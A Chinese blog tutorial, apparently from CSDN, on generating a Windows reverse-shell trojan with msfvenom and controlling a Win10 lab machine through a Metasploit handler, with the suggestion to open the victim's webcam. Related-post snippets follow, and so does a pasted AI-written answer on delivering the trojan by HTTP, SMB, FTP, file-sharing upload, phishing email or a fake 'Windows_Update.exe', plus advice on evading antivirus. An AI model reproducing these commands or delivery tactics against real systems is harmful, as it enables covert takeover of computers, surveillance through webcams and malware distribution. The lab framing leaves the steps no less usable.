windows靶机_msfvenom生成木马之控制靶机

最新推荐文章于 2024-10-22 16:06:06 发布
原创 最新推荐文章于 2024-10-22 16:06:06 发布 · 1k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows靶机

本文介绍了如何使用msfvenom生成windows可执行木马文件,并通过kali Linux监听,实现在win10靶机上运行木马,从而控制靶机。实验环境包括kali和win10虚拟机,步骤涉及msfvenom生成木马、文件传输、metasploit配置与监听,最后展示了通过metasploit后渗透模块进行操作,如开启摄像头。

1、简介

本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10。

2、实验环境

1、一台kali虚拟机  ip为192.168.110.140

2、一台win10虚拟机

3、实验步骤

1、首先使用msfvenom生成一个可以被windows执行的exe木马文件。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.110.140 lport=4444 -f exe >shell.exe

97749ffd898735ad1bdde6946b4d06ec.png

2、把刚刚生成的exe木马文件传输到我们的win10靶机上

3、在kali上输入msfconsole打开metasploit

9e0787e0fb937bc83c1ee0d908dfc4c5.png

4、metasploit配置及监听

use exploit/multi/handler #加载模块

set payload windows/meterpreter/reverse_tcp #修改成我们之前生成木马时使用的payload

set lhost 192.168.110.140 #设置kali的IP地址为监听地址

set lport 4444 #设置监听端口

dad05cf54c79a47924b2c0c25594bf8a.png

以上配置全部配置完成后我们就可以输入run然后开始监听了

734302c8c7cc845377f13ed568650373.png

监听好后我们就可以用win10靶机点击我们的木马程序

点击后就连接上我们的kali攻击机了

5738b0e3ba6111c21f55dc3d36172bb3.png

之后我们就可以利用metetpreter这个后渗透模块干一些骚操作了

如用webcam打开摄像头等!

msfvenom生成木马攻击windows
afei001
03-25 1580
实验环境 攻击机:kali     IP:192.168.43.5 靶机windows 生成木马攻击windows 1.在kali上生成反弹木马 root@afei:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.5 lport=55555 -f exe > test.exe [-] No pla...
kali 生成PHP木马病毒进行靶机控制
chidaoqiannianzq的博客
10-17 1708
Msfvenom 是 Metasploit Framework 的一个非常强大的工具,它结合了之前 msfpayload 和 msfencode 的功能,用于生成各种类型的 Payloads,包括但不限于 shellcode、恶意文件、恶意链接等。Msfvenom 可以帮助渗透测试人员创建自定义的 Payloads,以用于渗透测试、漏洞利用和红队行动中。
使用msfvenom生成后门软件并对靶机进行远程控制
qq_39120795的博客
12-06 4443
如何使用msfvenom生成后门软件并对靶机进行远程控制
靶机高安全上传php木马,BUU UPLOAD COURSE | 一句话木马实操(PHP)
weixin_42146888的博客
03-11 1060
BUU UPLOAD COURSE | 一句话木马实操(PHP)这是一道上传一句话木马的裸题,解题思路也很明确,现在此详细记录,以供日后复习知识点用一句话木马:当知道了URL,就可以利用本地一张网页进行连接得到Webshellphp 一句话木马当这条语句被服务端执行了,我们同时利用 POST 请求上传变量 x 的值,例如 x=echo ‘Hello’php 解析器执行的实质上是 @eval("ec...
win7 环境靶机_靶机中心 - lsh4ck's Blog
weixin_36314050的博客
12-31 1024
2008R2数据中心版 x64基础web环境IIS 7.5 + MSSQL 2008R2Apache/2.2.15 + Mysql 5.5.61 + php-5.4.19jdk1.8.0_171 + apache-tomcat-7.0.92默认web目录TOMCAT C:\apache-tomcat-7.0.92\webapps\ROOTApache C:\Wamp\apache2.4\htdoc...
msf获取靶机shell进行远控
xiao_he0123的博客
01-25 4316
思路:msf制作exe木马文件靶机通过点击开启后门 原理:靶机执行木马文件后,向本机(你运行msf的主机)中发送信息,本机打开监听状态,收到信息后进行操作 前提:知道主机IP(命令行输入ifconfig) (1)msf制作木马 输入命令行生成木马exe并保存在var/www/html文件中,这样靶机就可以直接从网页中下载木马 命令行中参数意义: 然后开启apache服务: (2)靶机下载运行木马本机进行监听 靶机在浏览器中输入192.168.40...
漏洞payload 靶机_metasploit利用漏洞渗透攻击靶机
weixin_39903176的博客
12-23 838
1、网络测试环境构建首先需要先配置好一个渗透测试用的网络环境,包括如图1所示的运行Kali Linux系统的计算机,如图2所示的老师给的Windows Server 2000系统的计算机。这两台计算机处于同一个网段中,可以相互通讯,Kali系统用作攻击机,下面将在此系统上运行Metasploit进行渗透测试,而Windows 2000是本次任务中需要进行渗透入侵的靶机,保持安装后的默认状态,没有打...
msfvenom生成木马-windows
aheyor的博客
10-22 757
通常使用 Kali Linux(例如 Kali 2021.3)作为攻击系统,目标靶机Windows 10 专业版。请注意,这些步骤仅适用于合法的安全测试和学习目的。未经授权使用这些技术侵犯他人计算机系统是非法的。是 Metasploit 框架中的一个独立有效载荷生成器,它是。的替代品,用于生成后门程序。
利用msfvenom生成木马文件反弹shell
dreamthe的博客
11-19 4969
1.安装靶机和攻击机 首先自己是在虚拟机完成的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,我选择的win 7 这里记得在安装虚拟机的时候选择桥接模式,这样你的虚拟机和物理机或者其他虚拟机都是一个网段的。 kali的下载地址Get Kali | Kali Linux: 在虚拟机里面直接选择打开就可以了。 攻击机 kali ip是192.168.3.138 靶机 win server 2008 R2 ip是192.168.3.147 ...
渗透测试Metasploit框架体验(3. MsfVenom生成后门木马
weixin_51803729的博客
02-11 7823
渗透测试Metasploit框架体验(3. MsfVenom生成后门木马
Windows环境中搭建不同靶机
weixin_51240556的博客
10-03 1839
Windows环境中搭建不同靶机 实验环境: VMware Workstation 实验器材: Windows2008或者windows2016 .XAMPP 一.搭建靶机DVWA如下图: 1.编辑 c:\xampp\apache\conf\httpd.conf: 在这里插入图片描述在这里插入图片描述在这里插入图片描述 2.复制 DVWA-master 源码到 C:\xampp\htdocs重命名为dvwa并解压,要保证网站文件在 C:\xampp\htdocs\dvwa 下 在这里插入图片描述3.重启
win7 环境靶机_使用Docker环境快速搭建靶机环境
weixin_39637049的博客
12-22 1123
在实际学习中,经常需要模拟不同的漏洞环境,而使用公网的实例的话,多多少少又存在一些风险,因此能搭建一个本地的模拟环境去测试漏洞是一个不错的方案。Docker是近两年来十分流行的开源容器引擎,因此也出现了很多使用Docker容器搭建的靶机环境供新手学习和使用。这次我们来介绍两款使用docker进行搭建的集成了各种漏洞的靶机环境:1. 由Phithon维护的VulhubVulhub是一个面向大众的开源...
metasploit上线windows2016靶机
qq_53030229的博客
05-17 968
文章目录一、生成后门二、windows2016靶机下载后门1、首先,我们需要开启apache2,然后将后门放入/var/www/html目录下2、windows2016下载后门程序三、设置监听1、开启metasploit2、设置监听模块四、上线windows2016靶机 攻击机:kali 靶机windows2016 一、生成后门 由于这个后门没有经过免杀,所以需要你们把windows2016防火墙关闭,你们·可以·自己去学习一下免杀 msfvenom -p windows/meterpreter/reve
Windows 10下安装Metasploit3靶机
qq_42943698的博客
03-03 1490
前言 计算机网络安全课程实验需要用到metasploit2和metasploit3作为靶机,metasploit2是命令行形式,使用过程中有很大局限性,metasploit3拥有与平常使用的主机一样的图形化界面,漏洞相比metasploit2也更丰富,更适合渗透实验,但安装也相对复杂 所需工具 packer (v1.3.5) 最新版本可能会出错 vagrant (v2.1.0) vagrant-reloaded VirtualBox 第一次尝试安装在VMWare下没成功 步骤 metasploit3
pikachu靶场的搭建(win10系统)
qq_51795670的博客
12-28 3595
本篇适合于正在为搭建pikachu靶而场烦恼的小白,教你一步一步成功完成。
靶机测试,kali生成windows木马程序
2301_76361674的博客
05-03 1675
仅用于靶机测试!永恒之蓝:通过系统已有漏洞进行攻击,获得后门权限木马:通过将后门放到靶机上,获得权限。
网安小白学kali——植入木马控制靶机摄像头
weixin_58457050的博客
04-30 5980
植入木马监控(钓鱼式)
Windows 10系统下WeBug4.0靶场搭建
Ling_feng1101的博客
11-11 6649
Windows 10系统下WeBug4.0靶场搭建 最近在搭建webug4.0靶场时遇到一些蒙圈的问题,由于很长时间没有搭建过靶场了,在此简单记录一下。 资源链接:添加链接描述 提取码:3esy 注:源码版安装和虚拟机版安装里面都有教程 一:官方教程及说明 (1)准备工具:Phpstudy,Navicat ,Webug4.0 (2)安装步骤:安装phpstudy-安装Navicat -创建webug数据库-创建webug_sys数据库-创建webug_width_byte数据库-对应数据库名导入/sql/目
【记录】kali制作绕过火绒检测的木马(仅通过MSF的方式)
jennycisp的博客
12-26 3457
apt-get update报错关于kali2019.4的更新源 (任意选择其中一组就可用,我选的清华源)#清华大学#阿里云#中科大#浙大最后最后,上面安装的虚拟机在 apt-get update 之后的 apt-get upgrade报错,原因找了很久,发现可能是因为kali版本和VMware版本相差太远以至于update的包安装覆盖之类的问题导致报错。-----然后我重新下载了iso镜像,kali2021.4版本。结果upgrade还是有问题,甚至还upgrade之后莫名其妙连不上网络。
kali生成好的木马windows靶机该如何获取
最新发布
12-06
<think>我们讨论的是如何将Kali生成木马传输到Windows靶机。根据Kali生成木马文件(如demo12.exe或muma.exe),现在需要让Windows靶机获取这个文件。以下是几种常见方法: ### 一、直接传输方法(局域网适用) 1. **HTTP传输** - 在Kali开启HTTP服务(执行命令在木马所在目录): ```bash python3 -m http.server 80 # 使用Python3[^1] ``` - Windows靶机浏览器访问:`http://[Kali的IP]`下载文件 2. **SMB共享** - Kali创建共享目录: ```bash sudo mkdir /samba/share sudo chmod 777 /samba/share sudo nano /etc/samba/smb.conf ``` 添加配置: ```ini [share] path = /samba/share browsable = yes writable = yes guest ok = yes ``` - 重启服务: ```bash sudo systemctl restart smbd ``` - Windows靶机访问:`\\[Kali的IP]\share` ### 二、中间媒介传输 1. **U盘拷贝** 物理复制文件到Windows靶机(需物理接触) 2. **云存储中转** 上传木马到第三方网盘(如Google Drive),再从Windows下载 ### 三、社会工程学方法 1. **钓鱼邮件** 将木马作为附件发送给目标用户 2. **伪装更新** 将木马命名为`Windows_Update.exe`等诱导性名称 ### 四、自动化攻击(高级) ```mermaid graph LR A[Kali生成木马] --> B[启动监听] B --> C[传输木马靶机] C --> D[诱使靶机执行] ``` - 结合Metasploit自动化: ```bash msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.102.129 set LPORT 10001 exploit -j # 后台监听[^2] ``` ### 关键注意事项 - **防火墙设置**:确保Kali防火墙允许传输端口(如`sudo ufw allow 80`) - **文件免杀**:实际渗透中需对木马做免杀处理 - **权限问题**:确保Windows靶机有权限访问共享服务 > **传输成功率排序**: > 1. HTTP下载(成功率 ★★★★★) > 2. SMB共享(成功率 ★★★★☆) > 3. 钓鱼邮件(成功率 ★★☆☆☆) §§相关问题§§ 1. 如何检测Windows靶机是否下载了木马文件? 2. 木马Windows靶机无法执行怎么办? 3. 没有局域网连接时如何远程传输木马? 4. 如何提高钓鱼邮件的成功率? 5. Kali生成木马Windows Defender拦截如何解决? </think> 在Kali中生成木马文件(如`.exe`)传输到Windows靶机,可通过以下方法实现: --- ### 一、局域网内直接传输(推荐) #### 方法1:HTTP服务下载 1. **Kali开启HTTP服务** 在木马文件目录执行: ```bash python3 -m http.server 80 # 使用Python3 # 或 busybox httpd -p 80 -h . # 轻量级方案 ``` 2. **Windows靶机下载** 浏览器访问:`http://[Kali的IP地址]/demo12.exe` (如 `http://192.168.102.129/demo12.exe`) #### 方法2:SMB文件共享 1. **Kali配置共享** ```bash sudo mkdir /samba/share sudo chmod 777 /samba/share sudo nano /etc/samba/smb.conf ``` 添加配置: ```ini [share] path = /samba/share browsable = yes writable = yes guest ok = yes ``` 重启服务: ```bash sudo systemctl restart smbd ``` 2. **Windows访问共享** 文件资源管理器输入:`\\[Kali的IP]\share` 直接复制木马文件 --- ### 二、跨网络传输方案 #### 方法1:云存储中转 1. 上传木马到网盘(如Google Drive、Transfer.sh) ```bash curl --upload-file demo12.exe https://transfer.sh/demo12.exe ``` 2. Windows访问生成链接下载 #### 方法2:FTP传输 1. **Kali启动FTP** ```bash sudo apt install vsftpd sudo systemctl start vsftpd sudo cp demo12.exe /srv/ftp/ ``` 2. **Windows连接** 浏览器访问:`ftp://[Kali的IP]/demo12.exe` --- ### 三、社会工程学方法 1. **钓鱼邮件** 将木马作为邮件附件发送 2. **U盘植入** 物理接触靶机时直接拷贝 3. **伪装更新包** 重命名木马为`Windows_Update.exe`等诱导性名称 --- ### 四、自动化攻击流程 ```mermaid sequenceDiagram Kali->>+Kali: 生成木马(msfvenom) Kali->>+Kali: 启动HTTP服务(Python) Kali->>+Metasploit: 设置监听(handler) Windows->>+Kali: 访问http://kali_ip/demo12.exe Windows->>+Windows: 执行木马 Kali->>+Metasploit: 建立Meterpreter会话 ``` > **关键命令**: > 在Kali启动监听(需匹配木马payload): > ```bash > msfconsole > use exploit/multi/handler > set payload windows/x64/meterpreter_reverse_tcp > set LHOST 192.168.102.129 > set LPORT 10001 > exploit > ``` --- ### 注意事项 1. **防火墙配置**:确保Kali防火墙开放端口(如 `sudo ufw allow 80`) 2. **免杀处理**:实际渗透中需对木马做混淆避免被杀毒软件检测 3. **权限问题**:Windows靶机可能需要关闭实时防护 4. **路径确认**:使用 `pwd` 确认Kali中木马文件的准确路径
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值